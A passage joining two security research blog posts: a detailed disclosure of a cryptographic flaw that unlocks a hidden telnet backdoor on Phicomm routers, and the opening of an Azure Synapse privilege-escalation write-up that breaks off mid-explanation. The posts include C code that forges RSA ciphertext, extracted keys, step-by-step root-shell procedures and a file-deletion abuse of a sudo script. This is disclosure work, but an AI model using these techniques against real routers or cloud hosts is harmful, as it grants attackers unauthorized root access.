In [24]: len([x for x in D if x and any(x)]) / len(D)                                                                                                                                                
Out[24]: 0.903

Over 90% came back non-null. If the padding variable were set to RSA_PKCS1_PADDING, by contrast, we’d be entirely out of luck. Control of the plaintext would be virtually impossible:

In [85]: D = [pub_decrypt(os.urandom(0x80), padding="pkcs1") for x in range(1000)]
In [86]: len([x for x in D if x and any(x)]) / len(D)
Out[86]: 0.0

What this means is that so long as the server uses a padding-free cipher, we don’t actually need the private key in order to have some control over what RSA_public_decrypt() does with the message we send back to telnetd_startup at the beginning of State 2.

So, what kind of control are we after here? Simple: we want the first byte of the “decrypted” buffer to be printable. Why? Because the one thing we know about the random plaintext secret is that it’s composed of printable bytes, that is, bytes that fall somewhere between 0x21 and 0x7e, inclusive.

In [25]: len([x for x in D if (0x21 <= x[0]) and (x[0] < 0x7f)]) / len(D)                                                                                                                      
Out[25]: 0.372

So that winds up being true of about 37% of random 128-byte buffers.

Here’s a bit of C-code that will whip up some phony ciphertext, meeting these fairly broad specifications.

unsigned char *find_phony_ciphertext(RSA *rsa) {
unsigned char *phony_ciphertext;
unsigned char phony_plaintext[1024];
int plaintext_length;
memset(phony_plaintext, 0, 0x20);
phony_ciphertext = calloc(PHONY_CIPHERTEXT_LENGTH, sizeof(char));
do {
    random_buffer(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
    plaintext_length = decrypt_with_pubkey(rsa, 
phony_ciphertext, phony_plaintext);

if ((plaintext_length < 0x101) &&
(0x21 <= phony_plaintext[0]) &&
(phony_plaintext[0] < 0x7f)) {
printf("[!] Found stage 2 payload:\n");
hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
printf("[=] Decrypts to (%d bytes):\n", plaintext_length);
hexdump(phony_plaintext, plaintext_length);
return phony_ciphertext;
}
} while (1);
}

Once we’ve generated such a buffer, we then have a 1 in 94 (0x7f — 0x21) chance of having a message whose “decryption”, via the hardcoded RSA key, begins with the same character as the random secret plaintext. Those are astronomically better odds than trying to guess a 31-character string (94−31) or a 16-byte hash (2−128).

If we guess right, then the ephemeral password to temporarily enable telnetd will become MD5("+TEMP"), and the ephemeral password to permanently enable it will become MD5("+PERM)".

And in this fashion we can gain an unauthenticated root shell on the Phicomm router after somewhere in the ballpark of one hundred guesses.

Protocol Diagram Showing How the Backdoor Lock can be Picked

Proof of concept

To bring these findings together, I wrote a small proof-of-concept program in C that will reliably pick the lock on the Phicomm router’s backdoor and grant the user a root shell over telnet. You can see it in action below.

A screencast showing our exploit in action, successfully picking the lock on the Phicomm K2G router’s backdoor.

Picking the Lock on the K3C’s Backdoor

An advertisement for the Phicomm K3C, which sports an essentially identical backdoor.

I was curious whether Phicomm’s flagship router, the K3C, might implement the same backdoor protocol, and, if so, whether it might be vulnerable to an identical attack. These devices are still available through Phicomm’s Amazon storefront, for less than $30. So I put in an order for the device, and while I waited, set about scouring a few Chinese forums for surviving copies of the K3C’s firmware image. I was in luck! I was able to obtain firmware images for the K3C, in each of the following versions:

  • 32.1.15.93
  • 32.1.22.113
  • 32.1.26.175
  • 32.1.45.267
  • 32.1.46.268
$ find . -path "*usr/bin/telnetd_startup" -exec bash -c 'echo -e "$(grep -o "fw_ver .*" $(dirname {})/../../etc/config/system)\n\tMD5 HASH OF BINARY: $(md5sum {})\n\tPRODUCT IDENTIFIER: $(strings {} | grep VER)\n\tPUBLIC RSA KEY(S): $(strings -n 256 {})\n"' {} \;
fw_ver '32.1.15.93'
MD5 HASH OF BINARY: f53a60b140009d91b51e4f24e483e893 ./_K3C_V32.1.15.93.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
9FC8FFBF53AECF8461DEFB98D81486A5D2DEE341F377BA16FB1218FBAE23BB1F3766732F8D382E15543FC2980208D968E7AE1AC4B48F53719F6D9964E583A0B791150B9C0C354143AE285567D8C042240CA8D7A6446E49CCAF575ACC63C55BAC8CF5B6A77DEE0580E50C2BFEB62C06ACA49E0FD0831D1BB0CB72BC9B565313C9
fw_ver '32.1.22.113'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.22.113.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.26.175'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.26.175.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.45.267'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_SW_K3C_703004761_V32.1.45.267.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03
fw_ver '32.1.46.268'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_K3C_V32.1.46.268.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03

The older versions appeared to work differently, and in one of the writeups I dug up on Baidu, I found instructions for using a tool that sounded, at first, very much like mine in order to gain a root shell over telnet, so as to upgrade the firmware to the most recent version — something no longer facilitated by the official Phicomm firmware repository, which shut its doors when the company collapsed at the beginning of 2019.

A screenshot of Jack Cruise’s post (passed through Google Translate), showing how the RoutAckProV1B2.exe tool can be used to crack the backdoor implemented in an obsolescent version of the K3C firmware. This tool, unlike ours, cannot crack the backdoor protocol used on the most recent versions of Phicomm firmware for the K2G and K3C routers.

A quick look at RoutAckProV1B2.exe suggested that it did, indeed, interact with whatever runs on UDP port 21210 (0x52da in hexadecimal, da 52 in little-endian representation).

A hex dump of RoutAckProV1B2.exe, which hints that this tool, too, interacts with a service that listens on UDP port 21210 on the router.

I wondered if I’d been scooped, for a moment, and spun up a Windows VM on the isolated network to which Phicomm K2G was connected. I downloaded the RoutAckProV1B2 tool, and monitored it with procmon.exe and Wireshark as it tried in vain to open the backdoor on the K2G. This tool wasn’t sending the handshake token, "ABCDEF1234".

A screenshot of the RoutAckProV1B2.exe tool running in a Windows VM, while being inspected by the Windows process monitor.

Instead it was sending a single 128-byte payload, five times in succession, before finally giving up.

This is the “magic packet” that the RoutAckProV1B2.exe tool uses to unlock the backdoor installed an older versions of Phicomm router firmware.
A closeup of the RoutAckProV1B2.exe tool, courtesy of Jack Cruise. The website www.right.com.cn is a Chinese-language forum for sharing technical information on a variety of routers.
Here we see the RoutAckProV1B2.exe tool unsuccessfully attempting to open the backdoor on a virtual machine running the most recent firmware I could find for the Phicomm K3C.

Versions 32.1.45 of the firmware and up, however, shared an identical build of the telnetd_startup daemon, which appeared to differ from its counterpart on the K2G router only in having been compiled to a big-endian MIPS instruction set, rather than the little-endian architecture found in the K2G. Surprisingly, this binary hadn’t been stripped of symbols, which made life just a little bit easier.

The function that set the ephemeral passwords (see above) suffered from the same programming mistake as its K2G counterpart, and was almost certainly built from the same source code.

A decompilation of the function I referred to above as “set_telnet_enable_keys()”, here seen in K3C’s build of the telnetd_startup binary. Here it’s compiled to a big-endian rather than little-endian MIPS architecture, and, unlike the K2G binary, has not been stripped of debugging symbols, which makes reverse engineering the binary somewhat easier. The algorithm is, nevertheless, identical.

All I’d need to do, then, was recover the hardcoded public RSA key from the binary and I could easily adapt my tool to pick the lock on this backdoor as well. Running strings -n 256 on the binary was all that it took.

Using strings -n 256 to grab the hardcoded public RSA key from the telnetd_startup binary in the K3C firmware (version 32.1.46.268).

strings also helped extract the product identifier. Where the Phicomm K2G build contained K2_COSTDOWN__VER_3.0, the K3C build had K3C_INTELALL_VER_3.0:

I used strings to grab the hardcoded product identifier from that binary, too.

I added this information to the table in the backdoor-lockpick tool, which associated product identifying strings with public RSA keys.

Adding the product identifier and hardcoded public RSA key to a lookup table used by my “backdoor lockpick” tool, enabling it to pick the lock on the K3C backdoor as well as the K2G one.

With a week to wait before my K3C arrived, I decided I’d make do with the tools at my disposal and emulate the K3C build of telnetd_startup in user mode with QEMU (wrapped, for the sake of portability and convenience, in a Docker container, following this method @drablyechos describes in this 2020 IOT Village talk at DEFCON, though the Docker wrapper isn’t strictly necessary).

The telnetd_startup daemon fails its preliminary search for the telnet flag in flash storage, since there’s no flash storage device to check, but it recovers from this failure gracefully and goes on to listen on UDP port 21210, just as it would if the telnet flag had been set to the disabled position in the flash device (which is, after all, the default setting).

The lockpick has no more trouble with this backdoor than it did with the one on the K2G.

A screencast showing my backdoor lockpick in action, again, this time picking the lock on the K3C’s backdoor. The K3C firmware, in this case, is being run on a virtual machine. The hardware was still in the mail.

For the sake of thoroughness, I decided to test RoutAckProV1B2.exe’s attack against my virtualized K3C, running firmware version 32.1.46.268.

Relying on Google Translate to read on-screen Chinese sometimes presents a challenge.

Google translate doing its best to help me read the log messages on RoutAckProV1B2.exe’s GUI.

Not entirely sure of what was happening here, I decided I’d better check Wireshark again. RoutAckProV1B2 was repeatedly sending 128-byte packets to my virtualized K3C server (running firmware version 32.1.46.268) on UDP port 21210, but receiving no replies. At no point did a telnet port open.

When tested against the older firmware version 32.1.26.175, however, RoutAckProV1B2.exe worked like a charm.

This seems to establish beyond any doubt that the most recent firmware versions for Phicomm’s K2G and K3C routers are using a new backdoor protocol, designed with better security but implemented with a catastrophic loophole, which permits anyone on the LAN to gain a root shell on either device.

The Phicomm K3C with International Firmware Version 33.1.25.177

Still unsure whether I’d tested the most recent versions of the Phicomm K3C firmware, or whether I’d find the same backdoor in the devices they’d built for the international market, I was eager to get my hands on a brand new K3C device. It arrived just as I was wrapping up with my K3C emulations.

I set up the router and found that the firmware running on this device bore the version 33.1.25.177, a major version bump ahead of the latest Chinese market firmware I’d tested.

The web admin interface for the international release of the K3C, running firmware version 33.1.25.177.

There was something listening on UDP port 21210, but it didn’t, at first, appear to behave like the backdoor I’d found on the Chinese market firmware I’d studied. Rather than listening silently until it received the magic handshake, ABCDEF1234, it would respond to any packet with an unpredictable, high-entropy packet containing exactly 128 bytes. I suspected this might be something like the encrypted secret that the backdoor would send to its client in Stage 2 of the protocol discussed above.

The behaviour was reminiscent of the simpler backdoor that the tool RoutAckProV1B2.exe seemed designed for, but I wasn’t able to get anywhere with that particular tool.

I figured I could make better sense of things if I could just look at the binary of whatever it was that listened on UDP port 21210 on this device, so I set to work taking it apart, in search of a UART port by which I might obtain a root shell.

I was in luck! The device not only sports a UART, but a clearly-labelled UART at that!

A clearly labelled UART at that!

So I grabbed my handy-dandy UART-to-USB serial bridge…

My handy-dandy UART-to-USB bridge.

…and set about soldering some header pins to the UART port. These devices are somewhat delicate machines, so I first tried to get as far as I could without disassembling everything and removing it from the casing. A hot air gun was helpful here.

And there we go:

UART pins ready!

The molten plastic casing was still a bit awkward to work around, however, so I did eventually end up taking things apart, and removing the unneeded upper board, which housed the RF components. Everything still worked fine.

With the UART adapter connected, I was able to obtain a serial connection using minicom, at 115200 Baud 8N1. This gave me access to a U-Boot BIOS shell after interrupting the boot process, with direct read and write access to the 1Gb F-die NAND flash storage chip (a Samsung 734 K9F1G08U0F SCB0), on which both the firmware and the bootloader are stored.

The Samsung 734 K9F1G08U0F SCB0.

If we let the boot process run its course, we’re presented with a linux login prompt. We could try to guess the password here, or take the more difficult, principled approach of first dumping the NAND and searching it for clues. Let’s do things the hard way. I adapted Valerio’s TCL expect script to hexdump the entire NAND volume, and left it running overnight.

Valerio’s U-Boot flash dumping script, adapted to work on the K3C.

I deserialized the hex back to binary with a bit of Python, and then went at it with the usual tools. The most rewarding turned out to be strings :

Digging some password hashes out of the NAND volume.

Hashcat didn’t have any trouble with this, and gave me one of the root passwords in seconds:

Returning to the login prompt while hashcat warmed up my office, I logged in with username root, password admin, and presto!

The firmware conveniently had netcat installed, and our old friend telnetd_startup was sitting right there in /usr/bin. I piped it over to my workstation, and dropped it into Ghidra.

The protocol implemented by the version of telnetd_startup in the latest international market firmware for the K3C closely resembles what we see in the Chinese market K2G 22.6.3.20 and the K3C 32.1.46.268. It differs only in omitting the initial stage. Rather than waiting for the ABCDEF1234 handshake, and then responding with a device identifying hash, it expects the initial packet to contain a message encrypted with the private RSA key that matches its hardcoded public key. It “decrypts” this message with the public key, XORs it with a randomly generated 31-character secret, and then, fatally, concatenates it with either +TEMP or +PERM using sprintf(), before hashing the result with MD5, to produce the ephemeral passwords for temporarily and permanently activating the telnet service respectively.

This all looks very familiar.
A familiar-looking xor() function in the international firmware for the K3C.
And here’s where they make their fatal mistake.

This algorithm is vulnerable to the same attack that worked against the three-stage backdoor protocol implemented in the telnetd_startup versions we’ve already looked at. All we need to do is grab the hardcoded public key and tweak our lockpick tool so that it skips the handshake/identifier stage when communicating with this particular release.

That public key, by the way, is

CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519

Remember that one.

I made the necessary adjustments to the tool, and it worked, again, like a charm!

An Exposed Private RSA Key in the K2 Router, with Firmware Version 22.5.9.163, but One that You Don’t Even Need

I mentioned, before, that another solution to this puzzle would simply be to obtain the private RSA key that matched the hardcoded public key. In the case of the K2G (the one in Wavlink’s clothing) I made some effort to search for the public key online, after converting it to various ASCII formats, just in case the pair had been left lying around somewhere. It was a long shot and didn’t pan out. But while I was exploring one of the older firmware images for Phicomm’s K2 line of routers— 22.5.9.163, dating from 2017— I noticed something interesting:

Look familiar?

It’s using the same public key we saw in the brand new international release of the Phicomm K3C. But there’s more:

That shouldn’t be there!

In firmware version 22.5.9.163 for the K2 router, Phicomm exposed the private RSA key corresponding to the hardcoded public key that they continued to deploy in their international release long after correcting the error in their domestic market firmware versions. This error didn’t go unnoticed — this key pair shows up in a strings dump of RoutAckProV1B2.exe, which attacks an earlier, simpler backdoor protocol than either of the two protocols analysed here.

The method for constructing the ephemeral passwords in the K2 22.5.9.163 differs from what we’ve seen in these later firmware versions. Instead of generating a random secret and XORing it with public-key-decrypted data received from the client prior to concatenating it with the two magic salts, this earlier release simply concatenates the client’s decrypted secret with the salts. Everything is then hashed with MD5, just as it was before, and the two passwords are set.

The md5_command() function from the telnetd_startup binary in the K2G 22.5.9.163 firmware.

Curiously, this release contains what must be a typo: instead of +PERM we have +PERP.

Now, leaked d parameter notwithstanding, it’s possible to crack open this backdoor without even using the private key. All that needs to be done is:

  1. Generate some ${phony_ciphertext} that the known public key will “decrypt” into a non-null buffer (call this the ${phony_plaintext}). It simplifies things if you also constrain things so that the phony plaintext contains no null bytes. This can be found pretty quickly through brute trial and error.
  2. Take the MD5 hash of the string ${phony_plaintext}+TEMP. Let’s call that the ${temp_password}.
  3. Send ${phony_ciphertext} to UDP port 21210 on the router.
  4. And then, quickly afterwards, send ${temp_password} to the same port.

This will open the telnet service on the K2 22.5.9.163. For a telnet service that persists after rebooting, do the same as above but substitute PERP for TEMP (this misspelling seems to be peculiar to this particular version).

A Reconstructed History of Phicomm’s Backdoor Protocols

In the course of researching this vulnerability, I’ve looked closely at eleven different firmware images. Arranged in order of build date, they are:

So, to sum things up, the history of the Phicomm backdoor looks like this:

The oldest generation I’ve found of Phicomm’s telnetd_startup protocol (shaded blue, in the tables above) is relatively simple: the server waits to receive an encrypted message, which it decrypts and hashes with two different salts. It then waits for another message, and if that message matches either of those hashes, it will either spawn the telnet service or write a flag to the flash drive to trigger the spawning of telnet on boot. This is the protocol we see in the K2 22.5.9.163, released in early 2017. That particular build made the blunder of hardcoding the private key in the binary, which defeats the purpose of asymmetric encryption. This error enabled the creation of RoutAckProV1B2.exe, a router-hacking tool which has been circulating online for several years, which uses the pilfered private key to allow any interested party to gain root access to this iteration of the backdoor. Of course, as we just saw, use of the private key isn’t even necessary to open the door. What the design overlooks — and this oversight will never be truly corrected — is that it’s not only possible but easy to generate phony ciphertext that a public RSA key will “decrypt” into predictable, phony plaintext. Doing so will permit an attacker to subvert the locking mechanism on the backdoor, and gain unauthorized entry.

Phicomm responded to this situation in an entirely insufficient fashion in the next generation of the protocol (shaded yellow, above), which we find in the firmware versions released later in 2017, including the still-for-sale international release of the K3C (analysed above). They redacted the private key from the binary, but failed to change the public key. Their next design, moreover, appears to share the assumption that it’s only by encrypting data with the private key that an attacker can predict or control the output of its public key decryption. Rather than addressing either of these errors, they just piled on further complexity: this is when they began to generate a 31-character random secret and XOR it with the public-key-decrypted data received from the client in order to generate their ephemeral passwords. This makes the backdoor slightly harder to attack, if we continue to ignore the leaked private key, but it’s ultimately just a matter of discovering some phony ciphertext that decrypts to a plaintext that begins with a printable ASCII character. This gives us a 1 in 92 chance of colliding with the first byte of the random secret, which, due to the careless use of sprintf‘s %s specifier for bytearray concatenation, will result in a completely predictable empheral password.

The next generation (mauve in the tables above) is the last I looked at, and likely the last released. Phicomm finally removed the compromised public key, and took the additional precaution of deploying a distinct public key to each router model. They also added a device-identifying handshake phase to the protocol, which makes the backdoor considerably stealthier — there’s no real way to tell that it’s listening on UDP port 21210, unless you send it the magic token ABCDEF1234. It responds to this magic token with a device-identifying hash, permitting the client to select the private key that matches the public key compiled into the service. The algorithm itself, however, shares the same security flaws as its predecessor, and is vulnerable to an essentially identical attack. This is the iteration we see in the Chinese market release of K3C 32.1.46.268, and the Chinese market K2G A1 22.6.3.20 — the firmware image that ended up on certain Wavlink-branded routers, that Wavlink neglected to flash with firmware of their own.

I’d love to conduct a more exhaustive test of various Phicomm firmware images, but they’re becomming rather difficult to find online. If you know where I might find a copy of a firmware version not mentioned here, please reach out to us at bughunters at tenable dot com.

Will these Vulnerabilities Ever Be Patched?

No.

These vulnerabilities will never be patched. Certainly not through official channels.

The Phicomm corporation is dead and gone.

After various attempts to contact Phicomm’s customer support offices in China, Germany, and California, and even reaching out to the CEO directly, I received this reply on October 10 from whatever remained of Phicomm’s American office.

Dear Sir,
Thank you for contacting Phicomm Support in Germany. Phicomm has closed all Business worldwide since 01.01.2019.
Yours sincerely
Service Team Phicomm

I’m not sure whether or not the @PHICOMM account on telegram.com is managed by the company, but if it is, things didn’t look good on that end, either.

Poor guy.

So, what exactly happened to Phicomm?

In 2015, while at the height of their economic power — with a net operating income of close to 10 billion yuan (a little over 1.5 billion USD), earning them comparisons to Huawei in the press — Phicomm, under the leadership of CEO and founder Gu Guoping, entered into a highly questionable business arrangement with the p2p lending company, Lianbi Financial. Former Project Director for Phicomm, James Soh, has posted on LinkedIn about

the sudden appearance in June 2015 of a person-to-person (P2P) financial service company called LianBi Finance that started month-long on-site promotion on company grounds. They claimed that LianBi Finance is a partner firm and there is proper agreement in place for collaboration between Shanghai Phicomm and LianBi Finance but it was never publicized. They promote financial products that has unrealistic returns. Thereafter, the tie-up between Shanghai Phicomm and LianBi Finance went further where Shanghai Phicomm home Wifi kit costing 399 RMB and up, shall be refunded by LianBi Finance for the full amount if the buyer scanned the QR code on the Wifi product box and provided personal details. People will buy more and more sets, however discovered that they cannot get the full amount back from the second set of kit they bought, instead they are offered to purchase a certain amount of financial investment products of say 5,000 RMB, and returns of 12% per month will be credited back into the buyer. This is a pyramid scheme in disguise. In addition, Mr Gu tied staff promotion and bonus in Shanghai Phicomm to how much LianBi products each person buy.
Gu Guoping, in better days than these.

Peer to Peer (P2P) lending is a high-risk financial instrument that often offers investors — that is, lenders —astonishingly high rates of return, and which has been criticized for being a Ponzi scheme with extra steps. It would eventually become known that Gu “effectively also owned and controlled LianBi.” 2016 saw the beginnings of the Chinese government’s crackdown on P2P lending platforms, in a campaign that would reach its summit in 2018. LianBi Financial was filed that year, under suspicion of “illegally absorbing public deposits.” In 2021, the police raided LianBi’s offices and arrested Gu Guoping.

Police raiding the LianBi Financial headquarters.

A public hearing was held against Gu on February 4, that year, and on December 8, 2021,

Gu Guoping was sentenced to life imprisonment for the crime of fundraising fraud, deprived of political rights for life, and confiscated all personal property. Nong Jin, Chen Yu, Zhu Jun, Wang Jingjing, and Zhang Jimin were sentenced to fixed-term imprisonment ranging from 15 to 10 years for the crime of fund-raising fraud, as well as confiscation of personal property of RMB 5 million to 600,000.
Gu Guoping, together with a few of his associates, at a public hearing in the Shanghai №1 Intermediate People’s Court, on February 4, 2021. The yellow sign says “defendant”.

And this, in a nutshell, is why we can expect no patches from Phicomm for the vulnerabilities discussed in this post.

So, what about Wavlink?

This part of the story is still a little unclear, but it seems to me that what happened was this: sometime between May, 2018, when they released their last batch of routers, and January 2019, when they closed down business worldwide, Phicomm liquidated their remaining stock of routers, selling the surplus K2Gs to the Winstars corporation. Winstars then outfitted these devices with the branding of their subsidiary, Wavlink, and distributed them through Amazon, which is how a Phicomm router in Wavlink clothing eventually arrived on my desk.

After hitting a wall with Phicomm, I reached out to Wavlink to report these vulnerabilities I’d found on what was, in a sense, their hardware. I imagined that they’d be interested to hear that they had been shipping out devices with Phicomm’s firmware. They replied that they had “released related patches last year or the beginning of this year,” but gave no indication as to how the customer might be able to upgrade to those patches if they were among those whose Wavlink-branded routers were running Phicomm firmware.

If removing the backdoor is your chief concern, then it’s far from given that re-flashing your router with Wavlink firmware would put you on any firmer ground. Wavlink, in fact, has its own history of installing backdoors. And shoddy or not, at least Phicomm made an effort to lock their backdoors. If you’re interested in reading more about Wavlink’s own backdoors, I recommend you read James Clee’s excellent writeup.

What Should I Do With my Phicomm Router?

There no longer exists an official avenue to update the firmware on any Phicomm router. The company collapsed entirely well before we discovered these zero days.

An intrepid user can, however, at their own risk, leverage one or more of the vulnerabilities documented above to re-flash their router with an open-source firmware like OpenWRT, which now supports several Phicomm models. There’s considerable risk of bricking your device in the process, and it isn’t for the faint of heart, but it’s quite probably the surest way to rid your router of the vulnerabilities analysed here.

Other creative solutions, available to the adventurous, might include using the backdoor to modify the firmware by hand —by disabling the telnetd_startup daemon, say. The user might also attempt to simply restrict access to UDP port 21210 by means of a firewall rule.

Remote management should be disabled immediately, if nothing else.

Disclosure Timeline

  • Tuesday, October 5, 2021: Phicomm customer support contacted to report vulnerabilities
  • Sunday, October 10, 2021: Phicomm’s German office replies to inform us that Phicomm “has closed all business worldwide since 01.01.2019.”
  • Thursday, October 7, 2021: Wavlink notified that several of their “AC1200” routers have shipped with vulnerable Phicomm firmware
  • Friday, October 8, 2021: Wavlink responds to request further details
  • Friday, October 29, 2021: Wavlink provided with requested details
  • Monday, December 6, 2021: Reminder sent to Wavlink after receiving no response

A Backdoor Lockpick was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Synapse Pwnalytics

Synapse Analytics is a platform used for machine learning, data aggregation, and other such computational work. One of the primary developer-oriented features of this platform is the use of Jupyter notebooks. These are essentially blocks of code that can be run independently of one another in order to analyze different subsets of data.

Synapse Analytics is currently listed under Microsoft’s high-impact scenarios in the Azure Bug Bounty program. Microsoft states that products and scenarios listed under that heading have the highest potential impact to customer security.

Synapse Analytics utilizes Apache Spark for the underlying provisioning of clusters that user code is run on. User code in these environments is run with intentionally limited privileges because the environments are managed by internal Microsoft subscription IDs, which is generally indicative of a multi-tenant environment.

Tenable Research has discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. We have also discovered a flaw that allows a user to poison the hosts file on all nodes in their Spark pool, which allows one to redirect subsets of traffic and snoop on services users generally do not have access to. The full privilege escalation flaw has been adequately addressed. However, the hosts file poisoning flaw remains unpatched at the time of this writing.

Many of the keys, secrets, and services accessible via these attacks have traditionally allowed further lateral movement and potential compromise of Microsoft-owned infrastructure, which could lead to a compromise of other customers’ data as we’ve seen in several other cases recently, such as Wiz’s ChaosDB or Orca’s AutoWarp. For Synapse Analytics, however, access by a root user is limited to their own Spark pool. Access to resources outside of this pool would require additional vulnerabilities to be chained and exploited. While Tenable remains skeptical that cross-tenant access is not possible with the elevated level of access gained by exploitation of these flaws, the Synapse engineering team has assured us that such a feat is not possible.

Tenable has rated this issue as Critical severity based on the context of the Spark VM itself. Microsoft considers this issue a Low severity defense-in-depth improvement based on the context of the Synapse Analytics environment as a whole. Microsoft states that cross-tenant impact of this issue is unlikely, if not impossible, based on this vulnerability alone.

We’ll get to the technical bits soon, but let’s first address some disclosure woes. When it comes to Synapse Analytics, Microsoft Security Response Center (MSRC) and the development team behind Synapse seem to have a major communications disconnect. It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.

During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. Their team stated the following (typos are Microsoft’s): “[W]e do not consider this to be a important severity security issue but rather a better practice.” If that were the case, why can snippets like the following be found throughout the Spark VMs?

It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occuring.

Unfortunately, communication errors and the downplaying of security issues in their products and cloud offerings is far from uncommon behavior for MSRC as of late. For a few more recent examples where MSRC has failed to adequately triage findings and has acted in bad faith towards researchers, check out the following research articles:

The Flaws

Privilege Escalation

The Jupyter notebook functionality of Synapse runs as a user called “trusted-service-user” within an Apache Spark cluster. These compute resources are provisioned to a specific Azure tenant, but are managed internally by Microsoft. This can be verified by viewing the subscription ID of the nodes on the cluster (only visible with elevated privileges and the Azure metadata service). This is indicative of a multi-tenant environment.

Not our subscription ID

This “trusted-service-user” has limited access to many of the resources on the host and is intentionally unable to interact with “waagent,” the Azure metadata service, the Azure WireServer service, and many other services only intended to be accessed by the root user and other special accounts end-users do not normally have access to.

That said, the trusted-service-user does have sudo access to a utility that is used to mount file shares from other Azure services:

The above screenshot shows that the Jupyter notebook code is running as the “trusted-service-user” account and that it has sudo access to run a particular script without requiring a password.

The filesharemount.sh script happens to contain a handful of flaws that, when combined, can be used to escalate privileges to root. The full text has been omitted from this section for brevity, but relevant bits are highlighted below.

#!/bin/bash
#
# NodeAgent installation script.
#
# Maintained by [email protected].
# Copyright © Microsoft Corporation. All rights reserved.
#
# this script use cifs to mount fileshare, will be deprecated once we implement fuse driver to mount fileshare
SCRIPT_DIR=”$( cd “$( dirname “${BASH_SOURCE[0]}” )” >/dev/null 2>&1 && pwd )”
source ${SCRIPT_DIR}/functions.sh
...

First and foremost, this script is clearly temporary and has likely not undergone strict review as indicated by the deprecation warning. Additionally, it appears that several functions are sourced from a “functions.sh” file in the same directory.

The functions provided by “functions.sh” are used for sanity checks throughout the main script. For example, the following is used to determine if a given mount point is valid before attempting to unmount it:

...
if [ “$commandtype” = “unmount” ]; then
check_if_is_valid_mount_point_before_unmount $args
umount $args
rm -rf $args
exit 0
fi
...

Moving on, the end of the main script is where we find the good stuff:

...
chown -R ${TRUSTED_SERVICE_USER}:${TRUSTED_SERVICE_USER} “$mountPoint”
uid=$(id -u ${TRUSTED_SERVICE_USER})
gid=$(id -g ${TRUSTED_SERVICE_USER})
mount -t cifs //”$account”.file.core.windows.net/”$fileshare” “$mountPoint” -o vers=3.0,uid=$uid,gid=$gid,username=”$account”,password=”$accountKey”,serverino
if [ “$?” -ne “0” ]; then
check_if_deletable_folder “$mountPoint”
rm -rf “$mountPoint”
exit 1
fi

Another of the check functions from functions.sh is used above, but this time the check is keyed off successfully running the mount command a few lines earlier. If the mount command fails, the mount point is deleted. By providing a mount point that passes all sanity checks to this point and that has invalid file share credentials, we can trigger the “rm” command in the above snippet. Let’s use it to get rid of the functions.sh file, and thus, all of the sanity check functions.

Full command used for file deletion:

